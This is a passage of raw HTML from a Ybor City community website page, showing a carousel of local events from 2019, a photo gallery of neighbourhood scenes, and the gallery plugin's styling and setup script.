srcset="https://yborcityonline.com/wp-content/uploads/2016/01/YCDC-Paver-Program-Icon.png 236w, https://yborcityonline.com/wp-content/uploads/2016/01/YCDC-Paver-Program-Icon-31x22.png 31w" sizes="(max-width: 236px) 100vw, 236px"></a></figure></div></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true class="vc_row wpb_row vc_row-fluid vc_custom_1477516749921 vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><div class="sc_section margin_top_small-"><div class=sc_section_inner><div class="sc_content content_wrap margin_top_small"><h3 class="sc_title sc_title_regular sc_align_center margin_top_small margin_bottom_tiny" style="text-align:center;">Upcoming Events</h3><div id=sc_blogger_1142093451 class="sc_blogger layout_classic_4 template_classic sc_blogger_horizontal sc_scroll_controls sc_scroll_controls_type_side sc_scroll_controls_horizontal"><div id=sc_blogger_1142093451_scroll class="sc_scroll sc_scroll_horizontal sc_slider_noresize swiper-slider-container scroll-container" style=width:100%;><div class="sc_scroll_wrapper swiper-wrapper"><div class="sc_scroll_slide swiper-slide"><div class=isotope_wrap data-columns=4><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/Ybor_City_Saturday_Market.jpg data-title="Ybor City Saturday Market"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/ybor-city-saturday-market/><img class=wp-post-image width=740 height=524 alt="Ybor City Saturday Market" src=https://yborcityonline.com/wp-content/uploads/2016/10/Ybor_City_Saturday_Market-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/ybor-city-saturday-market/ class=post_info_date>May 18, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/ybor-city-saturday-market/>Ybor City Saturday Market</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/ybor-city-saturday-market/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=1045 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/56174905_2258332554424018_4354893089190445056_n.jpg data-title="End of Parade Season Mourning Celebration- Hosted by the Krewe of Algeria"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/end-of-parade-season-mourning-celebration-hosted-by-the-krewe-of-algeria/><img class=wp-post-image width=740 height=524 alt="End of Parade Season Mourning Celebration- Hosted by the Krewe of Algeria" src=https://yborcityonline.com/wp-content/uploads/2019/05/56174905_2258332554424018_4354893089190445056_n-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/end-of-parade-season-mourning-celebration-hosted-by-the-krewe-of-algeria/ class=post_info_date>May 18, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/end-of-parade-season-mourning-celebration-hosted-by-the-krewe-of-algeria/>End of Parade Season Mourning Celebration- Hosted by the Krewe of Algeria</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/end-of-parade-season-mourning-celebration-hosted-by-the-krewe-of-algeria/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8025 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-5.jpg data-title="Weekly Ybor/ Tampa Business Networking"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/weekly-ybor-tampa-business-networking/><img class=wp-post-image width=740 height=524 alt="Weekly Ybor/ Tampa Business Networking" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-5-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/weekly-ybor-tampa-business-networking/ class=post_info_date>May 22, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/weekly-ybor-tampa-business-networking/>Weekly Ybor/ Tampa Business Networking</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/weekly-ybor-tampa-business-networking/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8062 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-6.jpg data-title="Ybor City Wine Bar &#8211; Weekly Wine Society"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/ybor-city-wine-bar-weekly-wine-society/><img class=wp-post-image width=740 height=524 alt="Ybor City Wine Bar &#8211; Weekly Wine Society" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-6-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/ybor-city-wine-bar-weekly-wine-society/ class=post_info_date>May 22, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/ybor-city-wine-bar-weekly-wine-society/>Ybor City Wine Bar &#8211; Weekly Wine Society</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/ybor-city-wine-bar-weekly-wine-society/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8067 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/CRUSH-Happy-Hour-Banner-Untitled-Page.jpeg data-title="Crush Happy Hour"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/crush-happy-hour/><img class=wp-post-image width=740 height=524 alt="Crush Happy Hour" src=https://yborcityonline.com/wp-content/uploads/2016/10/CRUSH-Happy-Hour-Banner-Untitled-Page-740x524.jpeg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/crush-happy-hour/ class=post_info_date>May 24, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/crush-happy-hour/>Crush Happy Hour</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/crush-happy-hour/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=1042 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture.jpg data-title="Tampa City Ballet Presents &#8220;7th Ave &#038; Ybor&#8221;"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/tampa-city-ballet-presents-7th-ave-ybor/><img class=wp-post-image width=740 height=524 alt="Tampa City Ballet Presents &#8220;7th Ave &#038; Ybor&#8221;" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/tampa-city-ballet-presents-7th-ave-ybor/ class=post_info_date>May 25, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/tampa-city-ballet-presents-7th-ave-ybor/>Tampa City Ballet Presents &#8220;7th Ave &#038; Ybor&#8221;</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/tampa-city-ballet-presents-7th-ave-ybor/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8030 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2018/04/veterans-open-mic.jpg data-title="Veterans Community Open Mic"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/veterans-community-open-mic/><img class=wp-post-image width=740 height=524 alt="Veterans Community Open Mic" src=https://yborcityonline.com/wp-content/uploads/2018/04/veterans-open-mic-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/veterans-community-open-mic/ class=post_info_date>June 2, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/veterans-community-open-mic/>Veterans Community Open Mic</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/veterans-community-open-mic/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=6326 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_4 isotope_column_4 "><div class="post_item post_item_classic post_item_classic_4 post_format_standard even last"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-7.jpg data-title="80&#8217;s Night Fundraiser Pug Rescue of Florida"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/events/80s-night-fundraiser-pug-rescue-of-florida/><img class=wp-post-image width=740 height=524 alt="80&#8217;s Night Fundraiser Pug Rescue of Florida" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-7-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/events/80s-night-fundraiser-pug-rescue-of-florida/ class=post_info_date>July 20, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/events/80s-night-fundraiser-pug-rescue-of-florida/>80&#8217;s Night Fundraiser Pug Rescue of Florida</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/events/80s-night-fundraiser-pug-rescue-of-florida/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8071 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div></div></div></div><div id=sc_blogger_1142093451_scroll_bar class="sc_scroll_bar sc_scroll_bar_horizontal sc_blogger_1142093451_scroll_bar"></div></div><div class=sc_scroll_controls_wrap><a class=sc_scroll_prev href=#></a><a class=sc_scroll_next href=#></a></div></div><a href=https://yborcityonline.com/events/list/ class="sc_button sc_button_square sc_button_style_filled style_original sc_button_size_large aligncenter margin_top_medium margin_bottom_huge" style=width:125px;>Calendar of Events</a></div></div></div></div></div></div></div><div class=vc_row-full-width></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><style>/*<![CDATA[*/a.eg-henryharrison-element-1,a.eg-henryharrison-element-2{-webkit-transition:all .4s linear;-moz-transition:all .4s linear;-o-transition:all .4s linear;-ms-transition:all .4s linear;transition:all .4s linear}.eg-jimmy-carter-element-11 i:before{margin-left:0px;margin-right:0px}.eg-harding-element-17{letter-spacing:1px}.eg-harding-wrapper .esg-entry-media{overflow:hidden;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;padding:30px 30px 0px 30px}.eg-harding-wrapper .esg-entry-media img{overflow:hidden;border-radius:50%;-webkit-border-radius:50%;-moz-border-radius:50%}.eg-ulysses-s-grant-wrapper .esg-entry-media{overflow:hidden;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;padding:30px 30px 0px 30px}.eg-ulysses-s-grant-wrapper .esg-entry-media img{overflow:hidden;border-radius:50%;-webkit-border-radius:50%;-moz-border-radius:50%}.eg-richard-nixon-wrapper .esg-entry-media{overflow:hidden;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;padding:30px 30px 0px 30px}.eg-richard-nixon-wrapper .esg-entry-media img{overflow:hidden;border-radius:50%;-webkit-border-radius:50%;-moz-border-radius:50%}.eg-herbert-hoover-wrapper .esg-entry-media img{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#grayscale");filter:gray;-webkit-filter:grayscale(100%)}.eg-herbert-hoover-wrapper:hover .esg-entry-media img{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 1 0'/></filter></svg>#grayscale");-webkit-filter:grayscale(0%)}.eg-lyndon-johnson-wrapper .esg-entry-media img{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#grayscale");filter:gray;-webkit-filter:grayscale(100%)}.eg-lyndon-johnson-wrapper:hover .esg-entry-media img{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 1 0'/></filter></svg>#grayscale");-webkit-filter:grayscale(0%)}.esg-overlay.eg-ronald-reagan-container{background:-moz-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-webkit-gradient(linear,left top,left bottom,color-stop(50%,rgba(0,0,0,0)),color-stop(99%,rgba(0,0,0,0.83)),color-stop(100%,rgba(0,0,0,0.85)));background:-webkit-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-o-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-ms-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:linear-gradient(to bottom,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#00000000',endColorstr='#d9000000',GradientType=0 )}.eg-georgebush-wrapper .esg-entry-cover{background:-moz-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-webkit-gradient(linear,left top,left bottom,color-stop(50%,rgba(0,0,0,0)),color-stop(99%,rgba(0,0,0,0.83)),color-stop(100%,rgba(0,0,0,0.85)));background:-webkit-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-o-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:-ms-linear-gradient(top,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);background:linear-gradient(to bottom,rgba(0,0,0,0) 50%,rgba(0,0,0,0.83) 99%,rgba(0,0,0,0.85) 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#00000000',endColorstr='#d9000000',GradientType=0 )}.eg-jefferson-wrapper{-webkit-border-radius:5px !important;-moz-border-radius:5px !important;border-radius:5px !important;-webkit-mask-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAA5JREFUeNpiYGBgAAgwAAAEAAGbA+oJAAAAAElFTkSuQmCC) !important}.eg-monroe-element-1{text-shadow:0px 1px 3px rgba(0,0,0,0.1)}.eg-lyndon-johnson-wrapper .esg-entry-cover{background:-moz-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-webkit-gradient(radial,center center,0px,center center,100%,color-stop(0%,rgba(0,0,0,0.35)),color-stop(96%,rgba(18,18,18,0)),color-stop(100%,rgba(19,19,19,0)));background:-webkit-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-o-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-ms-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:radial-gradient(ellipse at center,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#59000000',endColorstr='#00131313',GradientType=1 )}.eg-wilbert-wrapper .esg-entry-cover{background:-moz-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-webkit-gradient(radial,center center,0px,center center,100%,color-stop(0%,rgba(0,0,0,0.35)),color-stop(96%,rgba(18,18,18,0)),color-stop(100%,rgba(19,19,19,0)));background:-webkit-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-o-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:-ms-radial-gradient(center,ellipse cover,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);background:radial-gradient(ellipse at center,rgba(0,0,0,0.35) 0%,rgba(18,18,18,0) 96%,rgba(19,19,19,0) 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#59000000',endColorstr='#00131313',GradientType=1 )}.eg-wilbert-wrapper .esg-entry-media img{-webkit-transition:0.4s ease-in-out;-moz-transition:0.4s ease-in-out;-o-transition:0.4s ease-in-out;transition:0.4s ease-in-out;filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#grayscale");filter:gray;-webkit-filter:grayscale(100%)}.eg-wilbert-wrapper:hover .esg-entry-media img{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 1 0'/></filter></svg>#grayscale");-webkit-filter:grayscale(0%)}.eg-phillie-element-3:after{content:" ";width:0px;height:0px;border-style:solid;border-width:5px 5px 0 5px;border-color:#000 transparent transparent transparent;left:50%;margin-left:-5px;bottom:-5px;position:absolute}.eg-howardtaft-wrapper .esg-entry-media img,.eg-howardtaft-wrapper .esg-media-poster{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 1 0'/></filter></svg>#grayscale");-webkit-filter:grayscale(0%)}.eg-howardtaft-wrapper:hover .esg-entry-media img,.eg-howardtaft-wrapper:hover .esg-media-poster{filter:url("data:image/svg+xml;utf8,<svg xmlns=http://www.w3.org/2000/svg><filter id=grayscale><feColorMatrix type='matrix' values='0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0'/></filter></svg>#grayscale");filter:gray;-webkit-filter:grayscale(100%)}.myportfolio-container .added_to_cart.wc-forward{font-family:"Open Sans";font-size:13px;color:#fff;margin-top:10px}.esgbox-title.esgbox-title-outside-wrap{font-size:15px;font-weight:700;text-align:center}.esgbox-title.esgbox-title-inside-wrap{padding-bottom:10px;font-size:15px;font-weight:700;text-align:center}/*]]>*/</style><style>.flat-light .navigationbuttons,.flat-light .esg-pagination,.flat-light .esg-filters{text-transform:uppercase;text-align:center}.flat-light .esg-filterbutton,.flat-light .esg-navigationbutton,.flat-light .esg-sortbutton,.flat-light .esg-cartbutton{color:#000;margin-right:5px;cursor:pointer;position:relative;z-index:2;padding:1px 30px;border:none;line-height:38px;border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;font-size:12px;font-weight:700;font-family:"Open Sans",sans-serif;display:inline-block;background:#fff;margin-bottom:5px}.flat-light .esg-navigationbutton{padding:2px 12px}.flat-light .esg-navigationbutton *{color:#000}.flat-light .esg-pagination-button:last-child{margin-right:0}.flat-light .esg-sortbutton-wrapper,.flat-light .esg-cartbutton-wrapper{display:inline-block}.flat-light .esg-sortbutton-order,.flat-light .esg-cartbutton-order{display:inline-block;vertical-align:top;border:none;width:40px;line-height:40px;border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;font-size:12px;font-weight:700;color:#999;cursor:pointer;background:#eee;background:#fff;margin-left:5px}.flat-light .esg-cartbutton{color:#fff;cursor:default !important}.flat-light .esg-cartbutton .esgicon-basket{color:#fff;font-size:15px;line-height:15px;margin-right:10px}.flat-light .esg-cartbutton-wrapper{cursor:default !important}.flat-light .esg-sortbutton,.flat-light .esg-cartbutton{display:inline-block;position:relative;cursor:pointer;margin-right:0px;border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px}.flat-light .esg-navigationbutton:hover,.flat-light .esg-filterbutton:hover,.flat-light .esg-sortbutton:hover,.flat-light .esg-sortbutton-order:hover,.flat-light .esg-cartbutton-order:hover,.flat-light .esg-filterbutton.selected{border-color:none;color:#000;background:#fff}.flat-light .esg-navigationbutton:hover *{color:#333}.flat-light .esg-sortbutton-order.tp-desc:hover{color:#333}.flat-light .esg-filter-checked{padding:1px 3px;color:#cbcbcb;background:#cbcbcb;margin-left:7px;font-size:9px;font-weight:300;line-height:9px;vertical-align:middle}.flat-light .esg-filterbutton.selected .esg-filter-checked,.flat-light .esg-filterbutton:hover .esg-filter-checked{padding:1px 3px 1px 3px;color:#fff;background:#000;margin-left:7px;font-size:9px;font-weight:300;line-height:9px;vertical-align:middle}</style><style>.eg-washington-container{background-color:rgba(0,0,0,0.65)}</style><style>.eg-washington-content{background-color:#fff;padding:0px 0px 0px 0px;border-width:0px 0px 0px 0px;border-radius:0px 0px 0px 0px;border-color:transparent;border-style:double;text-align:left}</style><style>.esg-grid .mainul li.eg-washington-wrapper{background-color:#3f424a;padding:0px 0px 0px 0px;border-width:0px 0px 0px 0px;border-radius:0px 0px 0px 0px;border-color:transparent;border-style:none}</style><style></style><article class="myportfolio-container flat-light" id=esg-grid-1-1-wrap><div id=esg-grid-1-1 class=esg-grid style="background-color: transparent;padding: 0px 0px 0px 0px ; box-sizing:border-box; -moz-box-sizing:border-box; -webkit-box-sizing:border-box;"><ul><li class="filterall eg-washington-wrapper"><div class=esg-media-cover-wrapper><div class=esg-entry-media><img src=https://yborcityonline.com/wp-content/plugins/essential-grid/public/assets/images/300x200transparent.png data-lazysrc=https://yborcityonline.com/wp-content/uploads/2016/12/20X30-Heart-of-Ybor-Sunrise-Best.jpg alt="Metal Archway over avenue entrance with words Ybor City shining behind the sun rising in the distance"></div><div class="esg-overlay eg-washington-container"></div></div></li><li class="filterall eg-washington-wrapper"><div class=esg-media-cover-wrapper><div class=esg-entry-media><img src=https://yborcityonline.com/wp-content/plugins/essential-grid/public/assets/images/300x200transparent.png data-lazysrc=https://yborcityonline.com/wp-content/uploads/2016/12/IMG_7765.jpg alt="Old two story wooden cigar factory, fenced off for renovation, featuring 14 large windows on each floor topped with 5 third story window views"></div><div class="esg-overlay eg-washington-container"></div></div></li><li class="filterall eg-washington-wrapper"><div class=esg-media-cover-wrapper><div class=esg-entry-media><img src=https://yborcityonline.com/wp-content/plugins/essential-grid/public/assets/images/300x200transparent.png data-lazysrc=https://yborcityonline.com/wp-content/uploads/2016/12/IMG_0183.jpg alt="Illuminated two story outdoor mall with large signage for Centro Ybor hanging above signange for Muvico movie theater"></div><div class="esg-overlay eg-washington-container"></div></div></li><li class="filterall eg-washington-wrapper"><div class=esg-media-cover-wrapper><div class=esg-entry-media><img src=https://yborcityonline.com/wp-content/plugins/essential-grid/public/assets/images/300x200transparent.png data-lazysrc=https://yborcityonline.com/wp-content/uploads/2016/12/B0034679.jpg alt="Rooster standing on railroad tracks with chickens in the background"></div><div class="esg-overlay eg-washington-container"></div></div></li><li class="filterall eg-washington-wrapper"><div class=esg-media-cover-wrapper><div class=esg-entry-media><img src=https://yborcityonline.com/wp-content/plugins/essential-grid/public/assets/images/300x200transparent.png data-lazysrc=https://yborcityonline.com/wp-content/uploads/2016/12/YC1016002.jpg alt="12,000-square-foot Ybor City mural across the exterior of three industrial buildings"></div><div class="esg-overlay eg-washington-container"></div></div></li></ul></div></article><div class=clear></div> <script>function eggbfc(winw,resultoption){var lasttop=winw,lastbottom=0,smallest=9999,largest=0,samount=0,lamoung=0,lastamount=0,resultid=0,resultidb=0,responsiveEntries=[{width:1400,amount:5},{width:1170,amount:5},{width:1024,amount:5},{width:960,amount:5},{width:778,amount:5},{width:640,amount:5},{width:480,amount:5}];if(responsiveEntries!=undefined&&responsiveEntries.length>0) jQuery.each(responsiveEntries,function(index,obj){var curw=obj.width!=undefined?obj.width:0,cura=obj.amount!=undefined?obj.amount:0;if(smallest>curw){smallest=curw;samount=cura;resultidb=index;} if(largest<curw){largest=curw;lamount=cura;} if(curw>lastbottom&&curw<=lasttop){lastbottom=curw;lastamount=cura;resultid=index;}}) if(smallest>winw){lastamount=samount;resultid=resultidb;} var obj=new Object;obj.index=resultid;obj.column=lastamount;if(resultoption=="id") return obj;else return lastamount;} if("even"=="even"){var coh=0,container=jQuery("#esg-grid-1-1");var cwidth=container.width(),ar="4:3",gbfc=eggbfc(jQuery(window).width(),"id"),row=2;ar=ar.split(":");aratio=parseInt(ar[0],0)/parseInt(ar[1],0);coh=cwidth/aratio;coh=coh/gbfc.column*row;var ul=container.find("ul").first();ul.css({display:"block",height:coh+"px"});} var essapi_1;jQuery(document).ready(function(){essapi_1=jQuery("#esg-grid-1-1").tpessential({gridID:1,layout:"even",forceFullWidth:"off",lazyLoad:"on",lazyLoadColor:"#FFFFFF",row:9999,loadMoreAjaxToken:"4a26909e9f",loadMoreAjaxUrl:"https://yborcityonline.com/wp-admin/admin-ajax.php",loadMoreAjaxAction:"Essential_Grid_Front_request_ajax",ajaxContentTarget:"ess-grid-ajax-container-",ajaxScrollToOffset:"0",ajaxCloseButton:"off",ajaxContentSliding:"on",ajaxScrollToOnLoad:"on",ajaxNavButton:"off",ajaxCloseType:"type1",ajaxCloseInner:"false",ajaxCloseStyle:"light",ajaxClosePosition:"tr",space:0,pageAnimation:"fade",paginationScrollToTop:"off",spinner:"spinner0",forceFullWidth:"on",evenGridMasonrySkinPusher:"off",lightBoxMode:"single",animSpeed:1000,delayBasic:1,mainhoverdelay:1,filterType:"single",showDropFilter:"hover",filterGroupClass:"esg-fgc-1",googleFonts:['Open+Sans:300,400,600,700,800','Raleway:100,200,300,400,500,600,700,800,900','Droid+Serif:400,700','trajan'],aspectratio:"4:3",responsiveEntries:[{width:1400,amount:5},{width:1170,amount:5},{width:1024,amount:5},{width:960,amount:5},{width:778,amount:5},{width:640,amount:5},{width:480,amount:5}]});});</script> </div></div></div></div></section></article><section class="related_wrap related_wrap_empty"></section> </div></div></div><footer class="footer_wrap widget_area scheme_original"><div class="footer_wrap_inner widget_area_inner"><div class=content_wrap><div 